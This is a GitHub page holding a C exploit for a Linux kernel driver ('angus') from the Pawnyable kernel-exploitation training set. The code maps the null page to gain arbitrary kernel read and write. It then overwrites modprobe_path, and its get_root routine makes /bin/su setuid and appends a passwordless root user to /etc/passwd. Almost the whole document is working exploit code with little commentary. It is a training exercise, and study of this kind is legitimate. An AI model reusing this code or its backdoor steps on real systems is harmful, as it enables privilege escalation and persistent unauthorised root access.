-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpawnyable_lk02_exploit.c
115 lines (100 loc) · 2.8 KB
/
pawnyable_lk02_exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#define module "/dev/angus"
#define CMD_INIT 0x13370001
#define CMD_SETKEY 0x13370002
#define CMD_SETDATA 0x13370003
#define CMD_GETDATA 0x13370004
#define CMD_ENCRYPT 0x13370005
#define CMD_DECRYPT 0x13370006
#define KBASE 0xffffffff81000000
int fd;
typedef struct {
char *key;
char *data;
size_t keylen;
size_t datalen;
} XorCipher;
XorCipher *nullptr = NULL;
typedef struct {
char *ptr;
size_t len;
} request_t;
int angus_init(void) {
request_t req = { NULL };
return ioctl(fd, CMD_INIT, &req);
}
int angus_setkey(char *key, size_t keylen) {
request_t req = { .ptr = key, .len = keylen };
return ioctl(fd, CMD_SETKEY, &req);
}
int angus_setdata(char *data, size_t datalen) {
request_t req = { .ptr = data, .len = datalen };
return ioctl(fd, CMD_SETDATA, &req);
}
int angus_getdata(char *data, size_t datalen) {
request_t req = { .ptr = data, .len = datalen };
return ioctl(fd, CMD_GETDATA, &req);
}
int angus_encrypt() {
request_t req = { NULL };
return ioctl(fd, CMD_ENCRYPT, &req);
}
int angus_decrypt() {
request_t req = { NULL };
return ioctl(fd, CMD_ENCRYPT, &req);
}
void AAR(char* dst, char *src, size_t len){
nullptr->data = src;
nullptr->datalen = len;
angus_getdata(dst, len);
}
void AAW(char* dst, char *src, size_t len){
char* tmp = (char*) malloc(len*sizeof(char));
AAR(dst, tmp, len);
for (int i = 0; i < sizeof(tmp); i++) {
printf("%02x ", tmp[i]); // should be 0 (plz be 0)
}
putchar('\n');
for (size_t i = 0; i < len; i++) tmp[i] ^= src[i];
nullptr->key = tmp;
nullptr->data = dst;
nullptr->keylen = len;
nullptr->datalen = len;
angus_encrypt();
free(tmp);
}
static void get_root(){
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/asd");
system("chmod +x /tmp/asd");
system("echo '#!/bin/sh' > /tmp/modprobe");
system("echo 'chmod +s /bin/su' >> /tmp/modprobe");
system("echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/modprobe");
system("chmod +x /tmp/modprobe");
system("/tmp/asd");
system("su pwn");
}
int main(){
fd = open(module, O_RDWR);
char *needle, *buf = malloc(0x1000000);
mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0);
unsigned long addr = 0xffffffff81e37e60;
unsigned long content;
printf("[+] Found MODPROBE: 0x%016lx\n", addr);
AAR((char*)&content, (char*)addr, 8);
printf("[+] MODPROBE: 0x%016lx\n", content);
char ovw[] = "\x07\x0f\x19\x41";
AAW((char*)(addr+1), ovw, sizeof(ovw));
AAR((char*)&content, (char*)addr, 8);
printf("[+] MODPROBE: 0x%016lx\n", content);
get_root();
return 0;
}